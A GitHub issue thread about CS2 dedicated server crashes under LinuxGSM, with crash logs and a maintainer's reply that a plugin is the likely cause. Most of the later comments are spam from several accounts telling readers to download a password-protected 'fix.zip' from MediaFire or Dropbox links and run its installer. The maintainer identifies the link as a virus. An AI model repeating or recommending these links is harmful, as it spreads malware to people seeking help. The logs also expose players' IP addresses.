### ISSUE TITLE
[Bug]: Randomly Crash

### ISSUE THREAD

**Issue by NikolaJyun** [GameServerManagers/LinuxGSM#4635]
### User story

Attempt to fix or identify whether the crash is caused by LinuxGSM, Cssharp, Metamod, or plugins.

### Game

cs2

### Linux distro

Ubuntu 22.04

### Command

command: debug

### Further information

Sometimes, the server encounters unknown errors. I did some testing and found that these issues only occur when certain plugins are running, but the plugins don't report any errors. I have no idea how it happens, and it only triggers under certain conditions. Could it be an issue with LGSM?

### Relevant log output

```shell
cssharp 239 matemod 1293

/home/cs2server/cs2retake/lgsm/modules/command_debug.sh: line 121: 272438 Segmentation fault (core dumped) ./cs2 -dedicated -ip 220.132.77.244 -port 27021 -maxplayers 10 -authkey +exec cs2server.cfg
272438
The crash occurs when there are 10 players, and 4 of them close the game during the map load.

cssharp 259 metamod 1313

/home/cs2server/cs2retake/lgsm/modules/command_debug.sh: line 121: 278898 Segmentation fault (core dumped) ./cs2 -dedicated -ip 220.132.77.244 -port 27021 -maxplayers 10 -authkey +exec cs2server.cfg
I still don't know how this one gets triggered.
```

### Steps to reproduce

The crash occurs when there are 10 players, and 4 of them close the game during the map load.

**Comment by NikolaJyun** [comment]
New one 

Crash after stalling during map loading.

[22:09:01.390] CSSharp: CGameSystem::BuildGameSessionManifest
exec: couldn't exec '{}cfg/skill1.cfg', unable to read file
execing server_default.cfg
execing server.cfg
execing gamemode_competitive.cfg
exec: couldn't exec '{}cfg/gamemode_competitive_server.cfg', unable to read file
Unknown command 'mp_weapons_glow_on_ground'!
Unknown command 'sv_gameinstructor_enable'!
Model models/props/crates/csgo_drop_crate_wildfire.vmdl: sequence/animation name collision found "tools_preview"
Model models/props/crates/csgo_drop_crate_community_24.vmdl: sequence/animation name collision found "tools_preview"
Model models/props/crates/csgo_drop_crate_community_30.vmdl: sequence/animation name collision found "tools_preview"
Model models/props/crates/csgo_drop_crate_revolver.vmdl: sequence/animation name collision found "tools_preview"
Model models/props/crates/csgo_drop_crate_shadow.vmdl: sequence/animation name collision found "tools_preview"
Model models/props/crates/csgo_drop_crate_gamma.vmdl: sequence/animation name collision found "tools_preview"
Model models/props/crates/csgo_drop_crate_armsdeal3.vmdl: sequence/animation name collision found "tools_preview"
Model models/props/crates/csgo_drop_crate_huntsman.vmdl: sequence/animation name collision found "tools_preview"
Model models/props/crates/csgo_drop_crate_phoenix.vmdl: sequence/animation name collision found "tools_preview"
Model models/props/crates/csgo_drop_crate_chroma3.vmdl: sequence/animation name collision found "tools_preview"
Model models/props/crates/csgo_drop_crate_community_29.vmdl: sequence/animation name collision found "tools_preview"
Model models/props/crates/csgo_drop_crate_community_23.vmdl: sequence/animation name collision found "tools_preview"
Model models/props/crates/csgo_drop_crate_community_22.vmdl: sequence/animation name collision found "tools_preview"
Model models/props/crates/csgo_drop_crate_community_28.vmdl: sequence/animation name collision found "tools_preview"
Model models/props/crates/csgo_drop_crate_community_26.vmdl: sequence/animation name collision found "tools_preview"
Model models/props/crates/csgo_drop_crate_community_25.vmdl: sequence/animation name collision found "tools_preview"
Model models/props/crates/csgo_drop_crate_community_27.vmdl: sequence/animation name collision found "tools_preview"
Model models/props/crates/csgo_drop_crate_horizon.vmdl: sequence/animation name collision found "tools_preview"
Model models/props/crates/csgo_drop_crate_armsdeal2.vmdl: sequence/animation name collision found "tools_preview"
Model models/props/crates/csgo_drop_crate_spectrum2.vmdl: sequence/animation name collision found "tools_preview"
Model models/props/crates/csgo_drop_crate_glove.vmdl: sequence/animation name collision found "tools_preview"
Model models/props/crates/csgo_drop_crate_clutch.vmdl: sequence/animation name collision found "tools_preview"
Model models/props/crates/csgo_drop_crate_community_32.vmdl: sequence/animation name collision found "tools_preview"
Model models/props/crates/csgo_drop_crate_community_31.vmdl: sequence/animation name collision found "tools_preview"
Model models/props/crates/csgo_drop_crate_armsdeal1.vmdl: sequence/animation name collision found "tools_preview"
Model models/props/crates/csgo_drop_crate_hydra.vmdl: sequence/animation name collision found "tools_preview"
Model models/props/crates/csgo_drop_crate_winteroffensive.vmdl: sequence/animation name collision found "tools_preview"
Model models/props/crates/csgo_drop_crate_spectrum.vmdl: sequence/animation name collision found "tools_preview"
Model models/props/crates/csgo_drop_crate_bravo.vmdl: sequence/animation name collision found "tools_preview"
Model models/props/crates/csgo_drop_crate_gamma2.vmdl: sequence/animation name collision found "tools_preview"
Model models/props/crates/csgo_drop_crate_vanguard.vmdl: sequence/animation name collision found "tools_preview"
Model models/props/crates/csgo_drop_crate_breakout.vmdl: sequence/animation name collision found "tools_preview"
Model models/props/crates/csgo_drop_crate_chroma.vmdl: sequence/animation name collision found "tools_preview"
Model models/props/crates/csgo_drop_crate_bloodhound.vmdl: sequence/animation name collision found "tools_preview"
Model models/props/crates/csgo_drop_crate_chroma2.vmdl: sequence/animation name collision found "tools_preview"
Model models/props/crates/csgo_drop_crate_dangerzone.vmdl: sequence/animation name collision found "tools_preview"
SV: Spawn Server: de_ancient
CNetworkGameServerBase::SetServerState (ss_waitingforgamesessionmanifest -> ss_loading)
SV: Forcing client reconnect (SIGNONSTATE_CHANGELEVEL) for client 'Lin Jia Yu'
Client 5 'Lin Jia Yu' signon state SIGNONSTATE_CHANGELEVEL -> SIGNONSTATE_CONNECTED
SV: Forcing client reconnect (SIGNONSTATE_CHANGELEVEL) for client 'Хорошо⎝༼ ◕Д ◕'
Client 4 'Хорошо⎝༼ ◕Д ◕' signon state SIGNONSTATE_CHANGELEVEL -> SIGNONSTATE_CONNECTED
SV: Forcing client reconnect (SIGNONSTATE_CHANGELEVEL) for client 'Purehub CEO'
Client 8 'Purehub CEO' signon state SIGNONSTATE_CHANGELEVEL -> SIGNONSTATE_CONNECTED
SV: Forcing client reconnect (SIGNONSTATE_CHANGELEVEL) for client 'Leclerc'
Client 7 'Leclerc' signon state SIGNONSTATE_CHANGELEVEL -> SIGNONSTATE_CONNECTED
SV: Forcing client reconnect (SIGNONSTATE_CHANGELEVEL) for client 'dope'
Client 3 'dope' signon state SIGNONSTATE_CHANGELEVEL -> SIGNONSTATE_CONNECTED
SV: Forcing client reconnect (SIGNONSTATE_CHANGELEVEL) for client 'ArZiaI'
Client 9 'ArZiaI' signon state SIGNONSTATE_CHANGELEVEL -> SIGNONSTATE_CONNECTED
SV: Forcing client reconnect (SIGNONSTATE_CHANGELEVEL) for client 'kapit'
Client 6 'kapit' signon state SIGNONSTATE_CHANGELEVEL -> SIGNONSTATE_CONNECTED
SV: Forcing client reconnect (SIGNONSTATE_CHANGELEVEL) for client '瘋狗先生 沉默の狂犬'
Client 2 '瘋狗先生 沉默の狂犬' signon state SIGNONSTATE_CHANGELEVEL -> SIGNONSTATE_CONNECTED
CWorldRendererMgr::ServiceWorldRequests long frame: 73.722992ms
Failed loading resource "maps/prefabs/misc/terrorist_team_intro_variant2/world_visibility.vvis_c" (ERROR_FILEOPEN: File not found)
CNetworkGameServerBase::SetServerState (ss_loading -> ss_active)
SV: CNetworkServerService::FinishChangeLevel: reactivating previous clients
Client 256 'nccc' signon state SIGNONSTATE_CHANGELEVEL -> SIGNONSTATE_CONNECTED
Reactivate moving '瘋狗先生 沉默の狂犬' from slot 2 to slot 1
Reactivate moving 'dope' from slot 3 to slot 2
Reactivate moving 'Хорошо⎝༼ ◕Д ◕' from slot 4 to slot 3
Reactivate moving 'Lin Jia Yu' from slot 5 to slot 4
Reactivate moving 'kapit' from slot 6 to slot 5
Reactivate moving 'Leclerc' from slot 7 to slot 6
Reactivate moving 'Purehub CEO' from slot 8 to slot 7
Reactivate moving 'ArZiaI' from slot 9 to slot 8
SV: IGameSystem::LoopActivateAllSystems {
HO: IGameSystem::LoopActivateAllSystems {
HO: } IGameSystem::LoopActivateAllSystems done
SV: } IGameSystem::LoopActivateAllSystems done
Created physics for de_ancient
CNavGenParams - Nav mesh requests project default generation parameters but actual parameters
used during construction differ from defaults. Please re-export the map.
CNavGenParams - Nav mesh requests project default generation parameters but actual parameters
used during construction differ from defaults. Please re-export the map.
CNavGenParams - Nav mesh requests project default generation parameters but actual parameters
used during construction differ from defaults. Please re-export the map.
CNavGenParams - Nav mesh requests project default generation parameters but actual parameters
used during construction differ from defaults. Please re-export the map.
CNavGenParams - Nav mesh requests project default generation parameters but actual parameters
used during construction differ from defaults. Please re-export the map.
CNavGenParams - Nav mesh requests project default generation parameters but actual parameters
used during construction differ from defaults. Please re-export the map.
CNavGenParams - Nav mesh requests project default generation parameters but actual parameters
used during construction differ from defaults. Please re-export the map.
SV: 10 player server started
ClientPutInServer create new player controller [Officer]
"Officer<9><BOT><Unassigned>" ChangeTeam() CTMDBG , team 0, req team 2 willSwitch 0, 1.64
[Clutch Announce 1.1.0] OnRoundEnd event fired!
[Clutch Announce 1.1.0] OnRoundEnd event fired!
"Squad<9><BOT><TERRORIST>" ChangeTeam() CTMDBG , team 2, req team 3 willSwitch 0, 1.64
Host activate: Changelevel (de_ancient)
ClientPutInServer create new player controller [Farlow]
"Farlow<9><BOT><Unassigned>" ChangeTeam() CTMDBG , team 0, req team 2 willSwitch 0, 1.66
[Clutch Announce 1.1.0] OnRoundEnd event fired!
1.656250 Long frame (WarmupPeriod): 23.48ms elapsed, 23.32ms sim time, 1 ticks, 106..106.
ClientPutInServer create new player controller [Aspirant]
"Aspirant<9><BOT><Unassigned>" ChangeTeam() CTMDBG , team 0, req team 2 willSwitch 0, 1.67
[Clutch Announce 1.1.0] OnRoundEnd event fired!
1.671875 Long frame (WarmupPeriod): 21.02ms elapsed, 20.87ms sim time, 1 ticks, 107..107.
ClientPutInServer create new player controller [Leclerc]
Leclerc @ 1.169.226.131:57586: NetChan Setting Timeout to 120.00 seconds
ClientPutInServer create new player controller [瘋狗先生 沉默の狂犬]
瘋狗先生 @ 123.241.161.163:53000: NetChan Setting Timeout to 120.00 seconds
ClientPutInServer create new player controller [kapit]
kapit @ 36.232.25.164:57156: NetChan Setting Timeout to 120.00 seconds
ClientPutInServer create new player controller [ArZiaI]
ArZiaI @ 1.168.162.118:54705: NetChan Setting Timeout to 120.00 seconds
/home/cs2server/cs2retake/lgsm/modules/command_debug.sh: line 121: 284441 Segmentation fault (core dumped) ./cs2 -dedicated -ip 220.132.77.244 -port 27022 -maxplayers 10 -authkey +exec cs2server-2.cfg
[ ERROR ] Debuging cs2server-2: Server has stopped: exit code: 0
[ ERROR ] Debuging cs2server-2: Press ENTER to exit debug mode

**Comment by dgibbs64** [comment]
It is very likly to be a plugin causing the crash. LinuxGSM is a wrapper around CS2 and doesn't change anything about the server itself

**Comment by NikolaJyun** [comment]
ok ty!

**Comment by NimaJafariComp** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by NimaJafariComp** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by NikolaJyun** [comment]
@NimaJafariComp 

What is that? Is there a GitHub link?
Your link is broken.

**Comment by NimaJafariComp** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by NimaJafariComp** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by dgibbs64** [comment]
Link is a virus. I have reported it

**Comment by NimaJafariComp** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by IvanJrX** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by NimaJafariComp** [comment]
> Link is a virus. I have reported it

My account got hacked idk how yet, im deleting all the comments in every repo sorry for that

**Comment by esttemanb** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Searchanik** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
